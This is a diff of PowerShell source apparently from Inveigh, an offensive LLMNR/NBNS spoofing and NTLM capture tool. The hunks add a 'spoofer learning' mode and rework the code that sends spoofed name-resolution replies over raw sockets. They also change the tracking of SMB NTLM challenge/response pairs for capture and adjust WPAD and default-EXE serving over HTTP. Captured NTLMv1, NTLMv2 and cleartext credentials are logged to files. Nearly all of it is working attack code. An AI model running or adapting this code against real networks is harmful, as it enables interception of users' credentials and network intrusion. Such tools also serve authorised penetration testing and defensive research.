$inveigh.HTTP_directory $inveigh.request.RawUrl))) + if($HTTPDir -and $HTTPDefaultEXE -and $inveigh.request.RawUrl -like '*.exe' -and (Test-Path (Join-Path $HTTPDir $HTTPDefaultEXE)) -and !(Test-Path (Join-Path $HTTPDir $inveigh.request.RawUrl))) { - [Byte[]] $HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_EXE)) + [Byte[]]$HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $HTTPDir $HTTPDefaultEXE)) } - elseif($inveigh.HTTP_directory) + elseif($HTTPDir) { - if($inveigh.HTTP_default_file -and !(Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.request.RawUrl)) -and (Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_file)) -and $inveigh.request.RawUrl -notmatch '/wpad.dat') + if($HTTPDefaultFile -and !(Test-Path (Join-Path $HTTPDir $inveigh.request.RawUrl)) -and (Test-Path (Join-Path $HTTPDir $HTTPDefaultFile)) -and $inveigh.request.RawUrl -notmatch '/wpad.dat') { - [Byte[]] $HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_file)) + [Byte[]]$HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $HTTPDir $HTTPDefaultFile)) } - elseif($inveigh.HTTP_default_file -and $inveigh.request.RawUrl -eq '/' -and (Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_file))) + elseif($HTTPDefaultFile -and $inveigh.request.RawUrl -eq '/' -and (Test-Path (Join-Path $HTTPDir $HTTPDefaultFile))) { - [Byte[]] $HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_file)) + [Byte[]]$HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $HTTPDir $HTTPDefaultFile)) } - elseif($inveigh.WPAD_response -and $inveigh.request.RawUrl -match '/wpad.dat') + elseif($WPADResponse -and $inveigh.request.RawUrl -match '/wpad.dat') { - [Byte[]] $HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.WPAD_response) + [Byte[]]$HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($WPADResponse) } else { - if(Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.request.RawUrl)) + if(Test-Path (Join-Path $HTTPDir $inveigh.request.RawUrl)) { - [Byte[]] $HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.request.RawUrl)) + [Byte[]]$HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $HTTPDir $inveigh.request.RawUrl)) } else { - [Byte[]] $HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.HTTP_response) + [Byte[]]$HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($HTTPResponse) } } @@ -1283,23 +1294,23 @@ $HTTP_scriptblock = if($inveigh.request.RawUrl -match '/wpad.dat') { - $inveigh.message = $inveigh.WPAD_response + $inveigh.message = $WPADResponse } - elseif($inveigh.HTTP_response) + elseif($HTTPResponse) { - $inveigh.message = $inveigh.HTTP_response + $inveigh.message = $HTTPResponse } else { $inveigh.message = $null } - [Byte[]] $HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.message) + [Byte[]]$HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.message) } } else { - [Byte[]] $HTTP_buffer = $null + [Byte[]]$HTTP_buffer = $null } if(($HTTPAuth -eq 'NTLM' -and $inveigh.request.RawUrl -notmatch '/wpad.dat') -or ($WPADAuth -eq 'NTLM' -and $inveigh.request.RawUrl -match '/wpad.dat') -and !$NTLM_auth) @@ -1328,7 +1339,7 @@ $HTTP_scriptblock = # Sniffer/Spoofer ScriptBlock - LLMNR/NBNS Spoofer and SMB sniffer $sniffer_scriptblock = { - param ($LLMNR_response_message,$NBNS_response_message,$IP,$SpooferIP,$SMB,$LLMNR,$NBNS,$NBNSTypes,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore,$RunTime,$LLMNRTTL,$NBNSTTL) + param ($LLMNR_response_message,$NBNS_response_message,$IP,$SpooferIP,$SMB,$LLMNR,$NBNS,$NBNSTypes,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore,$SpooferLearning,$SpooferLearningDelay,$SpooferLearningInterval,$RunTime,$LLMNRTTL,$NBNSTTL) $byte_in = New-Object System.Byte[] 4 $byte_out = New-Object System.Byte[] 4 @@ -1347,10 +1358,18 @@ $sniffer_scriptblock = [Array]::Reverse($LLMNR_TTL_bytes) $NBNS_TTL_bytes = [System.BitConverter]::GetBytes($NBNSTTL) [Array]::Reverse($NBNS_TTL_bytes) + $LLMNR_learning_log = New-Object System.Collections.Generic.List[string] + $NBNS_learning_log = New-Object System.Collections.Generic.List[string] + + if($SpooferLearningDelay) + { + $spoofer_learning_delay = New-TimeSpan -Minutes $SpooferLearningDelay + $spoofer_learning_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() + } if($RunTime) { - $sniffer_timeout = new-timespan -Minutes $RunTime + $sniffer_timeout = New-TimeSpan -Minutes $RunTime $sniffer_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() } @@ -1397,7 +1416,16 @@ $sniffer_scriptblock = { if($SMB -eq 'Y') { - SMBNTLMResponse $payload_bytes + + if($NTLM_challenge -and $client_IP -eq $source_IP -and $client_port -eq $source_port) + { + SMBNTLMResponse $payload_bytes + } + + $client_IP = "" + $client_port = "" + $NTLM_challenge = "" + } } @@ -1406,7 +1434,16 @@ $sniffer_scriptblock = if($SMB -eq 'Y') { - SMBNTLMResponse $payload_bytes + + if($NTLM_challenge -and $client_IP -eq $source_IP -and $client_port -eq $source_port) + { + SMBNTLMResponse $payload_bytes + } + + $client_IP = "" + $client_port = "" + $NTLM_challenge = "" + } } @@ -1422,6 +1459,8 @@ $sniffer_scriptblock = if($SMB -eq 'Y') { + $client_IP = $destination_IP + $client_port = $destination_port $NTLM_challenge = SMBNTLMChallenge $payload_bytes } @@ -1432,6 +1471,8 @@ $sniffer_scriptblock = if($SMB -eq 'Y') { + $client_IP = $destination_IP + $client_port = $destination_port $NTLM_challenge = SMBNTLMChallenge $payload_bytes } @@ -1443,7 +1484,7 @@ $sniffer_scriptblock = 17 { # UDP - $source_port = $binary_reader.ReadBytes(2) + $source_port = $binary_reader.ReadBytes(2) $endpoint_source_port = DataToUInt16 ($source_port) $destination_port = DataToUInt16 $binary_reader.ReadBytes(2) $UDP_length = $binary_reader.ReadBytes(2) @@ -1452,21 +1493,20 @@ $sniffer_scriptblock = $payload_bytes = $binary_reader.ReadBytes(($UDP_length_uint - 2) * 4) # Incoming packets - switch ($destination_port) + switch($destination_port) { 137 # NBNS { - if($payload_bytes[5] -eq 1 -and $IP -ne $source_IP) + if(([System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-01-00-00' -or [System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-00-00-01') -and [System.BitConverter]::ToString($payload_bytes[10..11]) -ne '00-01') { - $UDP_length[0] += 16 + $UDP_length[0] += 12 $NBNS_response_data = $payload_bytes[13..$payload_bytes.Length] + - $NBNS_TTL_bytes + - 0x00,0x06,0x00,0x00 + - ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() + - 0x00,0x00,0x00,0x00 + $NBNS_TTL_bytes + + 0x00,0x06,0x00,0x00 + + ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() $NBNS_response_packet = 0x00,0x89 + $source_port[1,0] + @@ -1476,9 +1516,6 @@ $sniffer_scriptblock = 0x85,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x20 + $NBNS_response_data - $send_socket = New-Object Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Raw,[System.Net.Sockets.ProtocolType]::Udp) - $send_socket.SendBufferSize = 1024 - $destination_point = New-Object Net.IPEndpoint($source_IP,$endpoint_source_port) $NBNS_query_type = [System.BitConverter]::ToString($payload_bytes[43..44]) switch ($NBNS_query_type) @@ -1506,17 +1543,17 @@ $sniffer_scriptblock = '42-4D' { - $NBNS_query_type = '1C' + $NBNS_query_type = '1C' } '42-4E' { - $NBNS_query_type = '1D' + $NBNS_query_type = '1D' } '42-4F' { - $NBNS_query_type = '1E' + $NBNS_query_type = '1E' } } @@ -1547,54 +1584,154 @@ $sniffer_scriptblock = } until($n -gt ($NBNS_query_string_subtracted.Length - 1) -or $NBNS_query_string.Length -eq 15) + $NBNS_request_ignore = $false + if($NBNS -eq 'Y') { - if($NBNSTypes -contains $NBNS_query_type) + if($SpooferLearning -eq 'Y' -and $inveigh.valid_host_list -notcontains $NBNS_query_string -and [System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-01-00-00' -and $source_IP -ne $IP) { - - if ((!$SpooferHostsReply -or $SpooferHostsReply -contains $NBNS_query_string) -and (!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $NBNS_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ($inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP.IPAddressToString)) - { - $send_socket.sendTo($NBNS_response_packet,$destination_point) - $send_socket.Close() - $NBNS_response_message = "- spoofed response has been sent" - } - else + + if(($NBNS_learning_log.Exists({param($s) $s -like "20* $NBNS_query_string"}))) { + $NBNS_learning_queue_time = [DateTime]$NBNS_learning_log.Find({param($s) $s -like "20* $NBNS_query_string"}).SubString(0,19) - if($SpooferHostsReply -and $SpooferHostsReply -notcontains $NBNS_query_string) - { - $NBNS_response_message = "- $NBNS_query_string is not on reply list" - } - elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $NBNS_query_string) + if((Get-Date) -ge $NBNS_learning_queue_time.AddMinutes($SpooferLearningInterval)) { - $NBNS_response_message = "- $NBNS_query_string is on ignore list" - } - elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP) - { - $NBNS_response_message = "- $source_IP is not on reply list" - } - elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP) - { - $NBNS_response_message = "- $source_IP is on ignore list" + $NBNS_learning_log.RemoveAt($NBNS_learning_log.FindIndex({param($s) $s -like "20* $NBNS_query_string"})) + $NBNS_learning_send = $true } else { - $NBNS_response_message = "- not spoofed due to previous capture" + $NBNS_learning_send = $false } - + + } + else + { + $NBNS_learning_send = $true } + if($NBNS_learning_send) + { + $NBNS_transaction_ID = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)}) + $NBNS_transaction_ID_bytes = $NBNS_transaction_ID.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $NBNS_transaction_ID = $NBNS_transaction_ID -replace " ","-" + $NBNS_UDP_client = new-Object System.Net.Sockets.UdpClient 137 + $NBNS_hostname_bytes = $payload_bytes[13..($payload_bytes.Length - 5)] + + $NBNS_request_packet = $NBNS_transaction_ID_bytes + + 0x01,0x10,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x20 + + $NBNS_hostname_bytes + + 0x00,0x20,0x00,0x01 + + $NBNS_learning_destination_endpoint = New-Object System.Net.IPEndpoint([IPAddress]::broadcast,137) + $NBNS_UDP_client.Connect($NBNS_learning_destination_endpoint) + $NBNS_UDP_client.Send($NBNS_request_packet,$NBNS_request_packet.Length) + $NBNS_UDP_client.Close() + $NBNS_learning_log.Add("$(Get-Date -format 's') $NBNS_transaction_ID $NBNS_query_string") + $inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string sent to " + $NBNS_learning_destination_endpoint.Address.IPAddressToString) + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $NBNS_query_string sent to " + $NBNS_learning_destination_endpoint.Address.IPAddressToString)]) + } + + } + + if(($inveigh.valid_host_list -notcontains $NBNS_query_string -or $SpooferHostsReply -contains $NBNS_query_string) -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $NBNS_query_string) -and ( + !$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $NBNS_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and ( + !$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ($inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP.IPAddressToString) -and ($NBNS_query_string.Trim() -ne '*') -and ( + $SpooferLearning -eq 'N' -or ($SpooferLearning -eq 'Y' -and !$SpooferLearningDelay) -or ($SpooferLearningDelay -and $spoofer_learning_stopwatch.Elapsed -ge $spoofer_learning_delay)) -and ($source_IP -ne $IP) -and ( + $NBNSTypes -contains $NBNS_query_type)) + { + + if($SpooferLearning -eq 'N' -or !$NBNS_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"})) + { + $NBNS_send_socket = New-Object Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Raw,[System.Net.Sockets.ProtocolType]::Udp) + $NBNS_send_socket.SendBufferSize = 1024 + $NBNS_destination_point = New-Object Net.IPEndpoint($source_IP,$endpoint_source_port) + $NBNS_send_socket.SendTo($NBNS_response_packet,$NBNS_destination_point) + $NBNS_send_socket.Close() + $NBNS_response_message = "- response sent" + } + else + { + $NBNS_request_ignore = $true + } + } else { - $NBNS_response_message = "- spoof not sent due to disabled type" + + if($source_IP -eq $IP -and $NBNS_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"})) + { + $NBNS_request_ignore = $true + } + elseif($NBNSTypes -notcontains $NBNS_query_type) + { + $NBNS_response_message = "- disabled NBNS type" + } + elseif($SpooferHostsReply -and $SpooferHostsReply -notcontains $NBNS_query_string) + { + $NBNS_response_message = "- $NBNS_query_string is not on reply list" + } + elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $NBNS_query_string) + { + $NBNS_response_message = "- $NBNS_query_string is on ignore list" + } + elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP) + { + $NBNS_response_message = "- $source_IP is not on reply list" + } + elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP) + { + $NBNS_response_message = "- $source_IP is on ignore list" + } + elseif($NBNS_query_string.Trim() -eq '*') + { + $NBNS_response_message = "- NBSTAT request" + } + elseif($inveigh.valid_host_list -contains $NBNS_query_string) + { + $NBNS_response_message = "- $NBNS_query_string is a valid host" + } + elseif($inveigh.IP_capture_list -contains $source_IP.IPAddressToString) + { + $NBNS_response_message = "- previous capture from $source_IP" + } + elseif($SpooferLearningDelay -and $spoofer_learning_stopwatch.Elapsed -lt $spoofer_learning_delay) + { + $NBNS_response_message = "- " + [Int]($SpooferLearningDelay - $spoofer_learning_stopwatch.Elapsed.TotalMinutes) + " minute(s) until spoofing starts" + } + elseif($source_IP -eq $IP -and !$NBNS_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"})) + { + $NBNS_response_message = "- request is local" + } + else + { + $NBNS_response_message = "- something went wrong" + } + } } - $inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")]) + if(!$NBNS_request_ignore -and [System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-01-00-00') + { + $inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message") + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")]) + } + elseif($SpooferLearning -eq 'Y' -and [System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-00-00-01' -and $NBNS_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"})) + { + [Byte[]]$NBNS_response_IP_bytes = $payload_bytes[($payload_bytes.Length - 4)..($payload_bytes.Length)] + $NBNS_response_IP = [System.Net.IPAddress]$NBNS_response_IP_bytes + $NBNS_response_IP = $NBNS_response_IP.IPAddressToString + + if($inveigh.valid_host_list -notcontains $NBNS_query_string) + { + $inveigh.valid_host_list.Add($NBNS_query_string) + $inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS response $NBNS_response_IP for $NBNS_query_string received from $source_IP - $NBNS_query_string added to valid host list") + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - NBNS response $NBNS_response_IP for $NBNS_query_string received from $source_IP - $NBNS_query_string added to valid host list")]) + } + } } } @@ -1612,29 +1749,100 @@ $sniffer_scriptblock = ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() $LLMNR_response_packet = 0x14,0xeb + - $source_port[1,0] + - $UDP_length[1,0] + - 0x00,0x00 + - $payload_bytes[0,1] + - 0x80,0x00,0x00,0x01,0x00,0x01,0x00,0x00,0x00,0x00 + - $LLMNR_response_data + $source_port[1,0] + + $UDP_length[1,0] + + 0x00,0x00 + + $payload_bytes[0,1] + + 0x80,0x00,0x00,0x01,0x00,0x01,0x00,0x00,0x00,0x00 + + $LLMNR_response_data $LLMNR_query = [System.BitConverter]::ToString($payload_bytes[13..($payload_bytes.Length - 4)]) $LLMNR_query = $LLMNR_query -replace "-00","" - $LLMNR_query = $LLMNR_query.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} - $LLMNR_query_string = New-Object System.String($LLMNR_query,0,$LLMNR_query.Length) + + if($LLMNR_query.Length -eq 2) + { + $LLMNR_query = [Char][System.Convert]::ToInt16($LLMNR_query,16) + $LLMNR_query_string = New-Object System.String($LLMNR_query) + } + else + { + $LLMNR_query = $LLMNR_query.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $LLMNR_query_string = New-Object System.String($LLMNR_query,0,$LLMNR_query.Length) + } + + $LLMNR_request_ignore = $false if($LLMNR -eq 'Y') { - if((!$SpooferHostsReply -or $SpooferHostsReply -contains $LLMNR_query_string) -and (!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $LLMNR_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ($inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP.IPAddressToString)) + if($SpooferLearning -eq 'Y' -and $inveigh.valid_host_list -contains $LLMNR_query_string -and $source_IP -ne $IP) { - $send_socket = New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Raw,[System.Net.Sockets.ProtocolType]::Udp ) - $send_socket.SendBufferSize = 1024 - $destination_point = New-Object System.Net.IPEndpoint($source_IP,$endpoint_source_port) - $send_socket.SendTo($LLMNR_response_packet,$destination_point) - $send_socket.Close() - $LLMNR_response_message = "- spoofed response has been sent" + + if(($LLMNR_learning_log.Exists({param($s) $s -like "20* $LLMNR_query_string"}))) + { + $LLMNR_learning_queue_time = [DateTime]$LLMNR_learning_log.Find({param($s) $s -like "20* $LLMNR_query_string"}).SubString(0,19) + + if((Get-Date) -ge $LLMNR_learning_queue_time.AddMinutes($SpooferLearningInterval)) + { + $LLMNR_learning_log.RemoveAt($LLMNR_learning_log.FindIndex({param($s) $s -like "20* $LLMNR_query_string"})) + $LLMNR_learning_send = $true + } + else + { + $LLMNR_learning_send = $false + } + + } + else + { + $LLMNR_learning_send = $true + } + + if($LLMNR_learning_send) + { + $LLMNR_transaction_ID = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)}) + $LLMNR_transaction_ID_bytes = $LLMNR_transaction_ID.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $LLMNR_transaction_ID = $LLMNR_transaction_ID -replace " ","-" + $LLMNR_UDP_client = new-Object System.Net.Sockets.UdpClient + $LLMNR_hostname_bytes = $payload_bytes[13..($payload_bytes.Length - 5)] + + $LLMNR_request_packet = $LLMNR_transaction_ID_bytes + + 0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00 + + ($LLMNR_hostname_bytes.Length - 1) + + $LLMNR_hostname_bytes + + 0x00,0x01,0x00,0x01 + + $LLMNR_learning_destination_endpoint = New-Object System.Net.IPEndpoint([IPAddress]"224.0.0.252",5355) + $LLMNR_UDP_client.Connect($LLMNR_learning_destination_endpoint) + $LLMNR_UDP_client.Send($LLMNR_request_packet,$LLMNR_request_packet.Length) + $LLMNR_UDP_client_port = ($LLMNR_UDP_client.Client.LocalEndPoint).Port + $LLMNR_UDP_client.Close() + $LLMNR_learning_log.Add("$(Get-Date -format 's') $LLMNR_transaction_ID $LLMNR_query_string") + $inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string sent to 224.0.0.252") + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string sent to 224.0.0.252")]) + } + + } + + if(($inveigh.valid_host_list -notcontains $LLMNR_query_string -or $SpooferHostsReply -contains $LLMNR_query_string) -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $LLMNR_query_string) -and ( + !$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $LLMNR_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and ( + !$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ($inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP.IPAddressToString) -and ( + $SpooferLearning -eq 'N' -or ($SpooferLearning -eq 'Y' -and !$SpooferLearningDelay) -or ($SpooferLearningDelay -and $spoofer_learning_stopwatch.Elapsed -ge $spoofer_learning_delay))) + { + + if($SpooferLearning -eq 'N' -or !$LLMNR_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"})) + { + $LLMNR_send_socket = New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Raw,[System.Net.Sockets.ProtocolType]::Udp ) + $LLMNR_send_socket.SendBufferSize = 1024 + $LLMNR_destination_point = New-Object System.Net.IPEndpoint($source_IP,$endpoint_source_port) + $LLMNR_send_socket.SendTo($LLMNR_response_packet,$LLMNR_destination_point) + $LLMNR_send_socket.Close() + $LLMNR_response_message = "- response sent" + } + else + { + $LLMNR_request_ignore = $true + } } else { @@ -1655,21 +1863,77 @@ $sniffer_scriptblock = { $LLMNR_response_message = "- $source_IP is on ignore list" } + elseif($inveigh.valid_host_list -contains $LLMNR_query_string) + { + $LLMNR_response_message = "- $LLMNR_query_string is a valid host" + } + elseif($inveigh.IP_capture_list -contains $source_IP.IPAddressToString) + { + $LLMNR_response_message = "- previous capture from $source_IP" + } + elseif($SpooferLearningDelay -and $spoofer_learning_stopwatch.Elapsed -lt $spoofer_learning_delay) + { + $LLMNR_response_message = "- " + [Int]($SpooferLearningDelay - $spoofer_learning_stopwatch.Elapsed.TotalMinutes) + " minute(s) until spoofing starts" + } else { - $LLMNR_response_message = "- not spoofed due to previous capture" + $LLMNR_response_message = "- something went wrong" } } } - $inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")]) + if(!$LLMNR_request_ignore) + { + $inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message") + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")]) + } + + } + } + + } + + switch($endpoint_source_port) + { + + 5355 # LLMNR Response + { + + if($SpooferLearning -eq 'Y' -and $LLMNR_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"})) + { + $LLMNR_query = [System.BitConverter]::ToString($payload_bytes[13..($payload_bytes[12] + 13)]) + $LLMNR_query = $LLMNR_query -replace "-00","" + + if($LLMNR_query.Length -eq 2) + { + $LLMNR_query = [Char][System.Convert]::ToInt16($LLMNR_query,16) + $LLMNR_query_string = New-Object System.String($LLMNR_query) + } + else + { + $LLMNR_query = $LLMNR_query.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $LLMNR_query_string = New-Object System.String($LLMNR_query,0,$LLMNR_query.Length) + } + + [Byte[]]$LLMNR_response_IP_bytes = $payload_bytes[($payload_bytes.Length - 4)..($payload_bytes.Length)] + $LLMNR_response_IP = [System.Net.IPAddress]$LLMNR_response_IP_bytes + $LLMNR_response_IP = $LLMNR_response_IP.IPAddressToString + + if($inveigh.valid_host_list -notcontains $LLMNR_query_string) + { + $inveigh.valid_host_list.Add($LLMNR_query_string) + $inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR response $LLMNR_response_IP for $LLMNR_query_string received from $source_IP - $LLMNR_query_string added to valid host list") + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR response $LLMNR_response_IP for $LLMNR_query_string received from $source_IP - $LLMNR_query_string added to valid host list")]) + } + } + } } + } } @@ -1686,14 +1950,6 @@ $sniffer_scriptblock = $inveigh.HTTP_listener.Close() } - if($inveigh.relay_running) - { - $inveigh.console_queue.Add("Inveigh Relay exited due to run time at $(Get-Date -format 's')") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Relay exited due to run time")]) - Start-Sleep -m 5 - $inveigh.relay_running = $false - } - $inveigh.console_queue.Add("Inveigh exited due to run time at $(Get-Date -format 's')") $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh exited due to run time")]) Start-Sleep -m 5 @@ -1740,25 +1996,25 @@ $sniffer_scriptblock = while($inveigh.log_file_queue.Count -gt 0) { $inveigh.log_file_queue[0]|Out-File $inveigh.log_out_file -Append - $inveigh.log_file_queue.RemoveRange(0,1) + $inveigh.log_file_queue.RemoveAt(0) } while($inveigh.NTLMv1_file_queue.Count -gt 0) { $inveigh.NTLMv1_file_queue[0]|Out-File $inveigh.NTLMv1_out_file -Append - $inveigh.NTLMv1_file_queue.RemoveRange(0,1) + $inveigh.NTLMv1_file_queue.RemoveAt(0) } while($inveigh.NTLMv2_file_queue.Count -gt 0) { $inveigh.NTLMv2_file_queue[0]|Out-File $inveigh.NTLMv2_out_file -Append - $inveigh.NTLMv2_file_queue.RemoveRange(0,1) + $inveigh.NTLMv2_file_queue.RemoveAt(0) } while($inveigh.cleartext_file_queue.Count -gt 0) { $inveigh.cleartext_file_queue[0]|Out-File $inveigh.cleartext_out_file -Append - $inveigh.cleartext_file_queue.RemoveRange(0,1) + $inveigh.cleartext_file_queue.RemoveAt(0) } } @@ -1796,9 +2052,9 @@ function HTTPListener() $HTTP_powershell = [PowerShell]::Create() $HTTP_powershell.Runspace = $HTTP_runspace $HTTP_powershell.AddScript($shared_basic_functions_scriptblock) > $null - $HTTP_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null - $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($HTTPAuth).AddArgument( - $HTTPBasicRealm).AddArgument($WPADAuth) > $null + $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPAuth).AddArgument( + $HTTPBasicRealm).AddArgument($HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument( + $HTTPDir).AddArgument($HTTPResponse).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null $HTTP_powershell.BeginInvoke() > $null } @@ -1816,6 +2072,7 @@ function SnifferSpoofer() $NBNS_response_message).AddArgument($IP).AddArgument($SpooferIP).AddArgument($SMB).AddArgument( $LLMNR).AddArgument($NBNS).AddArgument($NBNSTypes).AddArgument($SpooferHostsReply).AddArgument( $SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument($SpooferIPsIgnore).AddArgument( + $SpooferLearning).AddArgument($SpooferLearningDelay).AddArgument($SpooferLearningInterval).AddArgument( $RunTime).AddArgument($LLMNRTTL).AddArgument($NBNSTTL) > $null $sniffer_powershell.BeginInvoke() > $null } @@ -1825,7 +2082,7 @@ function SnifferSpoofer() # Startup Enabled Services # HTTP Server Start -if(($inveigh.HTTP -or $inveigh.HTTPS) -and $SMBRelay -eq 'N') +if($inveigh.HTTP -or $inveigh.HTTPS) { HTTPListener } @@ -1838,7 +2095,7 @@ if($inveigh.console_output) if($ConsoleStatus) { - $console_status_timeout = new-timespan -Minutes $ConsoleStatus + $console_status_timeout = New-TimeSpan -Minutes $ConsoleStatus $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() } @@ 